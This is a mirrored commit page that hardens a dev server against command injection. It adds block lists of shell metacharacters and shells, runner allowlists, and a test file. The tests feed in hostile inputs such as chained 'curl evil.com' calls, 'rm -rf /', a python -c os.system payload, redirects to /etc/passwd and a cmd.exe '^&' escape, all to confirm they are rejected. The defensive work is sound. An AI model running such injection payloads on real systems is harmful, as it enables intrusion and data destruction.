mirror of
https://github.com/leonvanzyl/autocoder.git
synced 2026-02-05 08:23:08 +00:00
fix: harden dev server RCE mitigations from PR #153
Address security gaps and improve validation in the dev server command execution path introduced by PR #153: Security fixes (critical): - Add missing shell metacharacters to dangerous_ops blocklist: single & (Windows cmd.exe command separator), >, <, ^, %, \n, \r - The single & gap was a confirmed RCE bypass on Windows where .cmd files are always executed via cmd.exe even with shell=False (CPython limitation documented in issue #77696) - Apply validate_custom_command_strict at /start endpoint for defense-in-depth against config file tampering Validation improvements: - Fix uvicorn --flag=value syntax (split on = before comparing) - Expand Python support: Django (manage.py), Flask, custom .py scripts - Add runners: flask, poetry, cargo, go, npx - Expand npm script allowlist: serve, develop, server, preview - Reorder PATCH /config validation to run strict check first (fail fast) - Extract constants: ALLOWED_NPM_SCRIPTS, ALLOWED_PYTHON_MODULES, BLOCKED_SHELLS for reuse and testability Cleanup: - Remove unused security.py imports from dev_server_manager.py - Fix deprecated datetime.utcnow() -> datetime.now(timezone.utc) - Remove unnecessary _remove_lock() in exception handlers where lock was never created (Popen failure path) Tests: - Add test_devserver_security.py with 78 tests covering valid commands, blocked shells, blocked commands, injection attempts, dangerous_ops blocking, and constant verification Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
This commit is contained in:
@@ -7,8 +7,8 @@ Uses project registry for path lookups and project_config for command detection.
|
||||
"""
|
||||
|
||||
import logging
|
||||
import sys
|
||||
import shlex
|
||||
import sys
|
||||
from pathlib import Path
|
||||
|
||||
from fastapi import APIRouter, HTTPException
|
||||
@@ -73,7 +73,20 @@ def get_project_dir(project_name: str) -> Path:
|
||||
|
||||
return project_dir
|
||||
|
||||
ALLOWED_RUNNERS = {"npm", "pnpm", "yarn", "uvicorn", "python", "python3"}
|
||||
ALLOWED_RUNNERS = {
|
||||
"npm", "pnpm", "yarn", "npx",
|
||||
"uvicorn", "python", "python3",
|
||||
"flask", "poetry",
|
||||
"cargo", "go",
|
||||
}
|
||||
|
||||
ALLOWED_NPM_SCRIPTS = {"dev", "start", "serve", "develop", "server", "preview"}
|
||||
|
||||
# Allowed Python -m modules for dev servers
|
||||
ALLOWED_PYTHON_MODULES = {"uvicorn", "flask", "gunicorn", "http.server"}
|
||||
|
||||
BLOCKED_SHELLS = {"sh", "bash", "zsh", "cmd", "powershell", "pwsh", "cmd.exe"}
|
||||
|
||||
|
||||
def validate_custom_command_strict(cmd: str) -> None:
|
||||
"""
|
||||
@@ -90,46 +103,85 @@ def validate_custom_command_strict(cmd: str) -> None:
|
||||
base = Path(argv[0]).name.lower()
|
||||
|
||||
# Block direct shells / interpreters commonly used for command injection
|
||||
if base in {"sh", "bash", "zsh", "cmd", "powershell", "pwsh"}:
|
||||
if base in BLOCKED_SHELLS:
|
||||
raise ValueError(f"custom_command runner not allowed: {base}")
|
||||
|
||||
if base not in ALLOWED_RUNNERS:
|
||||
raise ValueError(f"custom_command runner not allowed: {base}")
|
||||
raise ValueError(
|
||||
f"custom_command runner not allowed: {base}. "
|
||||
f"Allowed: {', '.join(sorted(ALLOWED_RUNNERS))}"
|
||||
)
|
||||
|
||||
# Block one-liner execution
|
||||
# Block one-liner execution for python
|
||||
lowered = [a.lower() for a in argv]
|
||||
if base in {"python", "python3"}:
|
||||
if "-c" in lowered:
|
||||
raise ValueError("python -c is not allowed")
|
||||
# Only allow: python -m uvicorn ...
|
||||
if len(argv) < 3 or argv[1:3] != ["-m", "uvicorn"]:
|
||||
raise ValueError("Only 'python -m uvicorn ...' is allowed")
|
||||
if len(argv) >= 3 and argv[1] == "-m":
|
||||
# Allow: python -m <allowed_module> ...
|
||||
if argv[2] not in ALLOWED_PYTHON_MODULES:
|
||||
raise ValueError(
|
||||
f"python -m {argv[2]} is not allowed. "
|
||||
f"Allowed modules: {', '.join(sorted(ALLOWED_PYTHON_MODULES))}"
|
||||
)
|
||||
elif len(argv) >= 2 and argv[1].endswith(".py"):
|
||||
# Allow: python manage.py runserver, python app.py, etc.
|
||||
pass
|
||||
else:
|
||||
raise ValueError(
|
||||
"Python commands must use 'python -m <module> ...' or 'python <script>.py ...'"
|
||||
)
|
||||
|
||||
if base == "flask":
|
||||
# Allow: flask run [--host ...] [--port ...]
|
||||
if len(argv) < 2 or argv[1] != "run":
|
||||
raise ValueError("flask custom_command must be 'flask run [options]'")
|
||||
|
||||
if base == "poetry":
|
||||
# Allow: poetry run <subcmd> ...
|
||||
if len(argv) < 3 or argv[1] != "run":
|
||||
raise ValueError("poetry custom_command must be 'poetry run <command> ...'")
|
||||
|
||||
if base == "uvicorn":
|
||||
if len(argv) < 2 or ":" not in argv[1]:
|
||||
raise ValueError("uvicorn must specify an app like module:app")
|
||||
|
||||
allowed_flags = {"--host", "--port", "--reload", "--log-level", "--workers"}
|
||||
i = 2
|
||||
while i < len(argv):
|
||||
a = argv[i]
|
||||
if a.startswith("-") and a not in allowed_flags:
|
||||
raise ValueError(f"uvicorn flag not allowed: {a}")
|
||||
i += 1
|
||||
for a in argv[2:]:
|
||||
if a.startswith("-"):
|
||||
# Handle --flag=value syntax
|
||||
flag_key = a.split("=", 1)[0]
|
||||
if flag_key not in allowed_flags:
|
||||
raise ValueError(f"uvicorn flag not allowed: {flag_key}")
|
||||
|
||||
if base in {"npm", "pnpm", "yarn"}:
|
||||
# Allow only dev/start scripts (no arbitrary exec)
|
||||
# Allow only known safe scripts (no arbitrary exec)
|
||||
if base == "npm":
|
||||
if len(argv) < 3 or argv[1] != "run" or argv[2] not in {"dev", "start"}:
|
||||
raise ValueError("npm custom_command must be 'npm run dev' or 'npm run start'")
|
||||
if len(argv) < 3 or argv[1] != "run" or argv[2] not in ALLOWED_NPM_SCRIPTS:
|
||||
raise ValueError(
|
||||
f"npm custom_command must be 'npm run <script>' where script is one of: "
|
||||
f"{', '.join(sorted(ALLOWED_NPM_SCRIPTS))}"
|
||||
)
|
||||
elif base == "pnpm":
|
||||
ok = (len(argv) >= 2 and argv[1] in {"dev", "start"}) or (len(argv) >= 3 and argv[1] == "run" and argv[2] in {"dev", "start"})
|
||||
ok = (
|
||||
(len(argv) >= 2 and argv[1] in ALLOWED_NPM_SCRIPTS)
|
||||
or (len(argv) >= 3 and argv[1] == "run" and argv[2] in ALLOWED_NPM_SCRIPTS)
|
||||
)
|
||||
if not ok:
|
||||
raise ValueError("pnpm custom_command must be 'pnpm dev/start' or 'pnpm run dev/start'")
|
||||
raise ValueError(
|
||||
f"pnpm custom_command must use a known script: "
|
||||
f"{', '.join(sorted(ALLOWED_NPM_SCRIPTS))}"
|
||||
)
|
||||
elif base == "yarn":
|
||||
ok = (len(argv) >= 2 and argv[1] in {"dev", "start"}) or (len(argv) >= 3 and argv[1] == "run" and argv[2] in {"dev", "start"})
|
||||
ok = (
|
||||
(len(argv) >= 2 and argv[1] in ALLOWED_NPM_SCRIPTS)
|
||||
or (len(argv) >= 3 and argv[1] == "run" and argv[2] in ALLOWED_NPM_SCRIPTS)
|
||||
)
|
||||
if not ok:
|
||||
raise ValueError("yarn custom_command must be 'yarn dev/start' or 'yarn run dev/start'")
|
||||
raise ValueError(
|
||||
f"yarn custom_command must use a known script: "
|
||||
f"{', '.join(sorted(ALLOWED_NPM_SCRIPTS))}"
|
||||
)
|
||||
|
||||
|
||||
def get_project_devserver_manager(project_name: str):
|
||||
@@ -255,6 +307,13 @@ async def start_devserver(
|
||||
# Validate command against security allowlist before execution
|
||||
validate_dev_command(command, project_dir)
|
||||
|
||||
# Defense-in-depth: also run strict structural validation at execution time
|
||||
# (catches config file tampering that bypasses the /config endpoint)
|
||||
try:
|
||||
validate_custom_command_strict(command)
|
||||
except ValueError as e:
|
||||
raise HTTPException(status_code=400, detail=str(e))
|
||||
|
||||
# Now command is definitely str and validated
|
||||
success, message = await manager.start(command)
|
||||
|
||||
@@ -346,12 +405,17 @@ async def update_devserver_config(
|
||||
except ValueError as e:
|
||||
raise HTTPException(status_code=400, detail=str(e))
|
||||
else:
|
||||
# Validate command against security allowlist before persisting
|
||||
# Strict structural validation first (most specific errors)
|
||||
try:
|
||||
validate_custom_command_strict(update.custom_command)
|
||||
except ValueError as e:
|
||||
raise HTTPException(status_code=400, detail=str(e))
|
||||
|
||||
# Then validate against security allowlist
|
||||
validate_dev_command(update.custom_command, project_dir)
|
||||
|
||||
# Set the custom command
|
||||
try:
|
||||
validate_custom_command_strict(update.custom_command)
|
||||
set_dev_command(project_dir, update.custom_command)
|
||||
except ValueError as e:
|
||||
raise HTTPException(status_code=400, detail=str(e))
|
||||
|
||||
@@ -14,18 +14,17 @@ This is a simplified version of AgentProcessManager, tailored for dev servers:
|
||||
import asyncio
|
||||
import logging
|
||||
import re
|
||||
import shlex
|
||||
import subprocess
|
||||
import sys
|
||||
import threading
|
||||
import shlex
|
||||
from datetime import datetime
|
||||
from datetime import datetime, timezone
|
||||
from pathlib import Path
|
||||
from typing import Awaitable, Callable, Literal, Set
|
||||
|
||||
import psutil
|
||||
|
||||
from registry import list_registered_projects
|
||||
from security import extract_commands, get_effective_commands, is_command_allowed
|
||||
from server.utils.process_utils import kill_process_tree
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
@@ -310,9 +309,16 @@ class DevServerProcessManager:
|
||||
return False, "Empty dev server command"
|
||||
|
||||
# SECURITY: block shell operators/metacharacters (defense-in-depth)
|
||||
dangerous_ops = ["&&", "||", ";", "|", "`", "$("]
|
||||
# NOTE: On Windows, .cmd/.bat files are executed via cmd.exe even with
|
||||
# shell=False (CPython limitation), so metacharacter blocking is critical.
|
||||
# Single & is a cmd.exe command separator, ^ is cmd escape, % enables
|
||||
# environment variable expansion, > < enable redirection.
|
||||
dangerous_ops = ["&&", "||", ";", "|", "`", "$(", "&", ">", "<", "^", "%"]
|
||||
if any(op in command for op in dangerous_ops):
|
||||
return False, "Shell operators are not allowed in dev server command"
|
||||
# Block newline injection (cmd.exe interprets newlines as command separators)
|
||||
if "\n" in command or "\r" in command:
|
||||
return False, "Newlines are not allowed in dev server command"
|
||||
|
||||
# Parse into argv and execute without shell
|
||||
argv = shlex.split(command, posix=(sys.platform != "win32"))
|
||||
@@ -349,7 +355,7 @@ class DevServerProcessManager:
|
||||
)
|
||||
|
||||
self._command = command
|
||||
self.started_at = datetime.utcnow()
|
||||
self.started_at = datetime.now(timezone.utc)
|
||||
self._detected_url = None
|
||||
|
||||
# Create lock once we have a PID
|
||||
@@ -364,12 +370,10 @@ class DevServerProcessManager:
|
||||
except FileNotFoundError:
|
||||
self.status = "stopped"
|
||||
self.process = None
|
||||
self._remove_lock()
|
||||
return False, f"Command not found: {argv[0]}"
|
||||
except Exception as e:
|
||||
self.status = "stopped"
|
||||
self.process = None
|
||||
self._remove_lock()
|
||||
return False, f"Failed to start dev server: {e}"
|
||||
|
||||
async def stop(self) -> tuple[bool, str]:
|
||||
|
||||
319
test_devserver_security.py
Normal file
319
test_devserver_security.py
Normal file
@@ -0,0 +1,319 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
Dev Server Security Tests
|
||||
=========================
|
||||
|
||||
Tests for dev server command validation and security hardening.
|
||||
Run with: python -m pytest test_devserver_security.py -v
|
||||
"""
|
||||
|
||||
import sys
|
||||
from pathlib import Path
|
||||
|
||||
import pytest
|
||||
|
||||
# Add project root to path
|
||||
sys.path.insert(0, str(Path(__file__).parent))
|
||||
|
||||
from server.routers.devserver import (
|
||||
ALLOWED_NPM_SCRIPTS,
|
||||
ALLOWED_PYTHON_MODULES,
|
||||
ALLOWED_RUNNERS,
|
||||
BLOCKED_SHELLS,
|
||||
validate_custom_command_strict,
|
||||
)
|
||||
|
||||
# =============================================================================
|
||||
# validate_custom_command_strict - Valid commands
|
||||
# =============================================================================
|
||||
|
||||
|
||||
class TestValidCommands:
|
||||
"""Commands that should pass validation."""
|
||||
|
||||
def test_npm_run_dev(self):
|
||||
validate_custom_command_strict("npm run dev")
|
||||
|
||||
def test_npm_run_start(self):
|
||||
validate_custom_command_strict("npm run start")
|
||||
|
||||
def test_npm_run_serve(self):
|
||||
validate_custom_command_strict("npm run serve")
|
||||
|
||||
def test_npm_run_preview(self):
|
||||
validate_custom_command_strict("npm run preview")
|
||||
|
||||
def test_pnpm_dev(self):
|
||||
validate_custom_command_strict("pnpm dev")
|
||||
|
||||
def test_pnpm_run_dev(self):
|
||||
validate_custom_command_strict("pnpm run dev")
|
||||
|
||||
def test_yarn_start(self):
|
||||
validate_custom_command_strict("yarn start")
|
||||
|
||||
def test_yarn_run_serve(self):
|
||||
validate_custom_command_strict("yarn run serve")
|
||||
|
||||
def test_uvicorn_basic(self):
|
||||
validate_custom_command_strict("uvicorn main:app")
|
||||
|
||||
def test_uvicorn_with_flags(self):
|
||||
validate_custom_command_strict("uvicorn main:app --host 0.0.0.0 --port 8000 --reload")
|
||||
|
||||
def test_uvicorn_flag_equals_syntax(self):
|
||||
validate_custom_command_strict("uvicorn main:app --port=8000 --host=0.0.0.0")
|
||||
|
||||
def test_python_m_uvicorn(self):
|
||||
validate_custom_command_strict("python -m uvicorn main:app --reload")
|
||||
|
||||
def test_python3_m_uvicorn(self):
|
||||
validate_custom_command_strict("python3 -m uvicorn main:app")
|
||||
|
||||
def test_python_m_flask(self):
|
||||
validate_custom_command_strict("python -m flask run")
|
||||
|
||||
def test_python_m_gunicorn(self):
|
||||
validate_custom_command_strict("python -m gunicorn main:app")
|
||||
|
||||
def test_python_m_http_server(self):
|
||||
validate_custom_command_strict("python -m http.server 8000")
|
||||
|
||||
def test_python_script(self):
|
||||
validate_custom_command_strict("python app.py")
|
||||
|
||||
def test_python_manage_py_runserver(self):
|
||||
validate_custom_command_strict("python manage.py runserver")
|
||||
|
||||
def test_python_manage_py_runserver_with_port(self):
|
||||
validate_custom_command_strict("python manage.py runserver 0.0.0.0:8000")
|
||||
|
||||
def test_flask_run(self):
|
||||
validate_custom_command_strict("flask run")
|
||||
|
||||
def test_flask_run_with_options(self):
|
||||
validate_custom_command_strict("flask run --host 0.0.0.0 --port 5000")
|
||||
|
||||
def test_poetry_run_command(self):
|
||||
validate_custom_command_strict("poetry run python app.py")
|
||||
|
||||
def test_cargo_run(self):
|
||||
# cargo is allowed but has no special sub-validation
|
||||
validate_custom_command_strict("cargo run")
|
||||
|
||||
def test_go_run(self):
|
||||
# go is allowed but has no special sub-validation
|
||||
validate_custom_command_strict("go run .")
|
||||
|
||||
|
||||
# =============================================================================
|
||||
# validate_custom_command_strict - Blocked shells
|
||||
# =============================================================================
|
||||
|
||||
|
||||
class TestBlockedShells:
|
||||
"""Shell interpreters that must be rejected."""
|
||||
|
||||
@pytest.mark.parametrize("shell", ["sh", "bash", "zsh", "cmd", "powershell", "pwsh", "cmd.exe"])
|
||||
def test_blocked_shell(self, shell):
|
||||
with pytest.raises(ValueError, match="runner not allowed"):
|
||||
validate_custom_command_strict(f"{shell} -c 'echo hacked'")
|
||||
|
||||
|
||||
# =============================================================================
|
||||
# validate_custom_command_strict - Blocked commands
|
||||
# =============================================================================
|
||||
|
||||
|
||||
class TestBlockedCommands:
|
||||
"""Commands that should be rejected."""
|
||||
|
||||
def test_empty_command(self):
|
||||
with pytest.raises(ValueError, match="cannot be empty"):
|
||||
validate_custom_command_strict("")
|
||||
|
||||
def test_whitespace_only(self):
|
||||
with pytest.raises(ValueError, match="cannot be empty"):
|
||||
validate_custom_command_strict(" ")
|
||||
|
||||
def test_python_dash_c(self):
|
||||
with pytest.raises(ValueError, match="python -c is not allowed"):
|
||||
validate_custom_command_strict("python -c 'import os; os.system(\"rm -rf /\")'")
|
||||
|
||||
def test_python3_dash_c(self):
|
||||
with pytest.raises(ValueError, match="python -c is not allowed"):
|
||||
validate_custom_command_strict("python3 -c 'print(1)'")
|
||||
|
||||
def test_python_no_script_or_module(self):
|
||||
with pytest.raises(ValueError, match="must use"):
|
||||
validate_custom_command_strict("python --version")
|
||||
|
||||
def test_python_m_disallowed_module(self):
|
||||
with pytest.raises(ValueError, match="not allowed"):
|
||||
validate_custom_command_strict("python -m pip install something")
|
||||
|
||||
def test_unknown_runner(self):
|
||||
with pytest.raises(ValueError, match="runner not allowed"):
|
||||
validate_custom_command_strict("curl http://evil.com")
|
||||
|
||||
def test_rm_rf(self):
|
||||
with pytest.raises(ValueError, match="runner not allowed"):
|
||||
validate_custom_command_strict("rm -rf /")
|
||||
|
||||
def test_npm_arbitrary_script(self):
|
||||
with pytest.raises(ValueError, match="npm custom_command"):
|
||||
validate_custom_command_strict("npm run postinstall")
|
||||
|
||||
def test_npm_exec(self):
|
||||
with pytest.raises(ValueError, match="npm custom_command"):
|
||||
validate_custom_command_strict("npm exec evil-package")
|
||||
|
||||
def test_pnpm_arbitrary_script(self):
|
||||
with pytest.raises(ValueError, match="pnpm custom_command"):
|
||||
validate_custom_command_strict("pnpm run postinstall")
|
||||
|
||||
def test_yarn_arbitrary_script(self):
|
||||
with pytest.raises(ValueError, match="yarn custom_command"):
|
||||
validate_custom_command_strict("yarn run postinstall")
|
||||
|
||||
def test_uvicorn_no_app(self):
|
||||
with pytest.raises(ValueError, match="must specify an app"):
|
||||
validate_custom_command_strict("uvicorn --reload")
|
||||
|
||||
def test_uvicorn_disallowed_flag(self):
|
||||
with pytest.raises(ValueError, match="flag not allowed"):
|
||||
validate_custom_command_strict("uvicorn main:app --factory")
|
||||
|
||||
def test_flask_no_run(self):
|
||||
with pytest.raises(ValueError, match="flask custom_command"):
|
||||
validate_custom_command_strict("flask shell")
|
||||
|
||||
def test_poetry_no_run(self):
|
||||
with pytest.raises(ValueError, match="poetry custom_command"):
|
||||
validate_custom_command_strict("poetry install")
|
||||
|
||||
|
||||
# =============================================================================
|
||||
# validate_custom_command_strict - Injection attempts
|
||||
# =============================================================================
|
||||
|
||||
|
||||
class TestInjectionAttempts:
|
||||
"""Adversarial inputs that attempt to bypass validation."""
|
||||
|
||||
def test_shell_via_path_traversal(self):
|
||||
with pytest.raises(ValueError, match="runner not allowed"):
|
||||
validate_custom_command_strict("/bin/sh -c 'echo hacked'")
|
||||
|
||||
def test_shell_via_relative_path(self):
|
||||
with pytest.raises(ValueError, match="runner not allowed"):
|
||||
validate_custom_command_strict("../../bin/bash -c whoami")
|
||||
|
||||
def test_none_input(self):
|
||||
with pytest.raises(ValueError, match="cannot be empty"):
|
||||
validate_custom_command_strict(None) # type: ignore[arg-type]
|
||||
|
||||
def test_integer_input(self):
|
||||
with pytest.raises(ValueError, match="cannot be empty"):
|
||||
validate_custom_command_strict(123) # type: ignore[arg-type]
|
||||
|
||||
def test_python_dash_c_uppercase(self):
|
||||
with pytest.raises(ValueError, match="python -c is not allowed"):
|
||||
validate_custom_command_strict("python -C 'exec(evil)'")
|
||||
|
||||
def test_powershell_via_path(self):
|
||||
with pytest.raises(ValueError, match="runner not allowed"):
|
||||
validate_custom_command_strict("C:\\Windows\\System32\\powershell.exe -c Get-Process")
|
||||
|
||||
|
||||
# =============================================================================
|
||||
# dev_server_manager.py - dangerous_ops blocking
|
||||
# =============================================================================
|
||||
|
||||
|
||||
class TestDangerousOpsBlocking:
|
||||
"""Test the metacharacter blocking in dev_server_manager.start()."""
|
||||
|
||||
@pytest.fixture
|
||||
def manager(self, tmp_path):
|
||||
from server.services.dev_server_manager import DevServerProcessManager
|
||||
return DevServerProcessManager("test-project", tmp_path)
|
||||
|
||||
@pytest.mark.asyncio
|
||||
@pytest.mark.parametrize("cmd,desc", [
|
||||
("npm run dev && curl evil.com", "double ampersand"),
|
||||
("npm run dev & curl evil.com", "single ampersand"),
|
||||
("npm run dev || curl evil.com", "double pipe"),
|
||||
("npm run dev | curl evil.com", "single pipe"),
|
||||
("npm run dev ; curl evil.com", "semicolon"),
|
||||
("npm run dev `curl evil.com`", "backtick"),
|
||||
("npm run dev $(curl evil.com)", "dollar paren"),
|
||||
("npm run dev > /etc/passwd", "output redirect"),
|
||||
("npm run dev < /etc/passwd", "input redirect"),
|
||||
("npm run dev ^& calc", "caret escape"),
|
||||
("npm run %COMSPEC%", "percent env expansion"),
|
||||
])
|
||||
async def test_blocks_shell_operator(self, manager, cmd, desc):
|
||||
success, message = await manager.start(cmd)
|
||||
assert not success, f"Should block {desc}: {cmd}"
|
||||
assert "not allowed" in message.lower()
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_blocks_newline_injection(self, manager):
|
||||
success, message = await manager.start("npm run dev\ncurl evil.com")
|
||||
assert not success
|
||||
assert "newline" in message.lower()
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_blocks_carriage_return(self, manager):
|
||||
success, message = await manager.start("npm run dev\r\ncurl evil.com")
|
||||
assert not success
|
||||
assert "newline" in message.lower()
|
||||
|
||||
@pytest.mark.asyncio
|
||||
@pytest.mark.parametrize("shell", ["sh", "bash", "zsh", "cmd", "powershell", "pwsh"])
|
||||
async def test_blocks_shell_runners(self, manager, shell):
|
||||
success, message = await manager.start(f"{shell} -c 'echo hacked'")
|
||||
assert not success
|
||||
assert "not allowed" in message.lower()
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_blocks_empty_command(self, manager):
|
||||
success, message = await manager.start("")
|
||||
assert not success
|
||||
assert "empty" in message.lower()
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_blocks_whitespace_command(self, manager):
|
||||
success, message = await manager.start(" ")
|
||||
assert not success
|
||||
assert "empty" in message.lower()
|
||||
|
||||
|
||||
# =============================================================================
|
||||
# Constants validation
|
||||
# =============================================================================
|
||||
|
||||
|
||||
class TestConstants:
|
||||
"""Verify security constants are properly defined."""
|
||||
|
||||
def test_all_common_shells_blocked(self):
|
||||
for shell in ["sh", "bash", "zsh", "cmd", "powershell", "pwsh", "cmd.exe"]:
|
||||
assert shell in BLOCKED_SHELLS, f"{shell} should be in BLOCKED_SHELLS"
|
||||
|
||||
def test_common_npm_scripts_allowed(self):
|
||||
for script in ["dev", "start", "serve", "preview"]:
|
||||
assert script in ALLOWED_NPM_SCRIPTS, f"{script} should be in ALLOWED_NPM_SCRIPTS"
|
||||
|
||||
def test_common_python_modules_allowed(self):
|
||||
for mod in ["uvicorn", "flask", "gunicorn"]:
|
||||
assert mod in ALLOWED_PYTHON_MODULES, f"{mod} should be in ALLOWED_PYTHON_MODULES"
|
||||
|
||||
def test_common_runners_allowed(self):
|
||||
for runner in ["npm", "pnpm", "yarn", "python", "python3", "uvicorn", "flask", "cargo", "go"]:
|
||||
assert runner in ALLOWED_RUNNERS, f"{runner} should be in ALLOWED_RUNNERS"
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
pytest.main([__file__, "-v"])
|
||||
Reference in New Issue
Block a user